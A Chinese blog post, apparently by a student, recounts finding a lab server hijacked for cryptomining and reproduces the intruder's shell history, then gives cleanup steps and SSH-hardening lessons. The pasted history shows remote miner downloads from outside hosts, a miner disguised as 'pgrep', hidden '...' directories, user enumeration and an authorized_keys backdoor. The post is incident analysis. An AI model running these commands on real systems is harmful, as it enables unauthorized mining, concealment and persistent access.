记一次服务器被入侵用来挖矿的事例

2021年3月1日 497Browse 6Like 3Comments

今天起来登陆实验室的服务器,发现有点卡顿。然后用top命令查看了一下cpu的占用率,发现有个cnrig的进程的cpu占用率非常高,google查了一下,发现竟然是用来挖矿的东西。我竟然被入侵了!!!

  • 使用nvidia-smi命令查看了一下显卡的占用情况,不出意外的高。实锤了!果然是财帛动人心啊。

  • 接下来得考虑怎么干掉这个玩意儿了。使用history命令查看一下痕迹,发现了这些东东。

  274  nvidia-smi
  275  passwd
  276  cd /var/tmp
  277  mkdir ...
  278  cd ....
  279  ls
  280  last n
  281  ip n
  282  mkdir ...
  283  cd ...
  284  nvidia-smi
  285  ls
  286  wget https://github.com/ethereum-mining/ethminer/releases/download/v0.18.0/ethminer-0.18.0-cuda-9-linux-x86_64.tar.gz ; tar xvf ethminer-0.18.0-cuda-9-linux-x86_64.tar.gz ; cd bin/
  287  cd ..
  288  mv bin .x
  289  cd .x
  290  ls
  291  nano pgrep
  292  ls
  293  chmod +x *
  294  nohup ./pgrep &
  295  top
  296  nvidia-smi
  297  wget nasapaul.com/cnrig
  298  wget https://bashupload.com/wQflZ/cnrigobf --no-check-certificate
  299  mv cnrigobf pgrep
  300  ls
  301  chmod +x &
  302  chmod +x *
  303  ls
  304  nohup ./pgrep &
  305  top
  306  cat /etc/passwd | grep "home" | cut -d: -f1 > usere; cat usere
  307  ls
  308  cd /root
  309  cd .ssh
  310  ls
  311  nano authorized_keys
  312  service sshd restart
  313  nvidia-smi
  314  top
  315  ls
  316  nvidia-smi

先看了下显卡好使不,然后直接安装挖矿软件开干,伪装的像模像样的!看了一下代码主要就是...文件夹,直接在root权限下删除。然后干掉正在运行的进程,发现cpu和显卡的占用率降下来了,过了几个小时都发现没有增高,看来问题是解决了。

教训

  • 将PC或者服务器暴露给外网的时候,一定要注意安全问题,ssh不能直接将root账户暴露出去,最好是用比较复杂的RSA密钥。
  • 内网做好相应的隔离。

agedcat_xuanzai

这个人很懒,什么都没留下

Comments

  • 乐乐

    沙发嘻嘻嘻(♡˙︶˙♡)

    2021年3月2日
  • zxy

    第二 好耶

    2021年3月2日
  • 乐乐姐

    所以矿工为什么会瞄上你们电脑2333莫非看起来像土豪?~( ̄▽ ̄~)~

    2021年3月3日